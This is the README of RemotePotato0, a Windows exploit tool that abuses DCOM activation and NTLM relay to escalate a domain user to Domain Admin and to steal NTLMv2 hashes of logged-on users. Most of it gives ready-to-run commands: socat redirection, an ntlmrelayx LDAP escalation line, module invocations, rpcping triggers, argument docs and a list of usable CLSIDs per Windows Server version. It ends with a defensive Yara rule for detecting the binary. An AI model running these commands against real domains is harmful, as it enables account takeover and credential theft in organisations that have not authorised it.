UPDATE 21-10-2022: The main exploit scenario RPC->LDAP of RemotePotato0 has been fixed. More details at -->
Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.
RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.
It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows to grab and steal NTLMv2 hashes of every users logged on a machine.
Attacker machine (
Victim machine (
Victim Domain Controller (
Module 0 - Rpc2Http cross protocol relay server + potato trigger
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP: &
sudo -t ldap:// --no-wcf-server --escalate-user normal_user
Note: if you are on Windows Server <= 2016 you can avoid the network redirector (socat) because the oxid resolution can be performed locally.
query user
.\RemotePotato0.exe -m 0 -r -x -p 9999 -s 1
Module 1 - Rpc2Http cross protocol relay server
.\RemotePotato0.exe -m 1 -l 9997 -r
rpcping -s -e 9997 -a connect -u ntlm
Module 2 - Rpc capture (hash) server + potato trigger
query user
.\RemotePotato0.exe -m 2 -s 1
Module 3 - Rpc capture (hash) server
.\RemotePotato0.exe -m 3 -l 9997
rpcping -s -e 9997 -a connect -u ntlm
@splinter_code & @decoder_it
Mandatory args:
-m module
Allowed values:
0 - Rpc2Http cross protocol relay server + potato trigger (default)
1 - Rpc2Http cross protocol relay server
2 - Rpc capture (hash) server + potato trigger
3 - Rpc capture (hash) server
Other args: (someone could be mandatory and/or optional based on the module you use)
-r Remote HTTP relay server ip
-t Remote HTTP relay server port (Default 80)
-x Rogue Oxid Resolver ip (default
-p Rogue Oxid Resolver port (default 9999)
-l RPC Relay server listening port (Default 9997)
-s Session id for the Cross Session Activation attack (default disabled)
-c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})
Cross session activation
Hash Stealer
A list of usable CLSID on various Windows version:
Windows Server 2019
{0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI
{5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll
{924DC564-16A6-42EB-929A-9A61FA7DA06F} - Authentication UI CredUI Out of Proc Helper for Non-AppContainer Clients
{934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog
{BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout
{c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host
{f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - SPPUIObjectInteractive Class
{f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser
Windows Server 2016
Windows Server 2008 R2
You can find a more complete list here -->
Yara rule to detect RemotePotato0 binary:
rule SentinelOne_RemotePotato0_privesc {
author = "SentinelOne"
description = "Detects RemotePotato0 binary"
reference = ""
$import1 = "CoGetInstanceFromIStorage"
$istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
$meow_header = { 4d 45 4f 57 }
$clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii
$clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
(uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)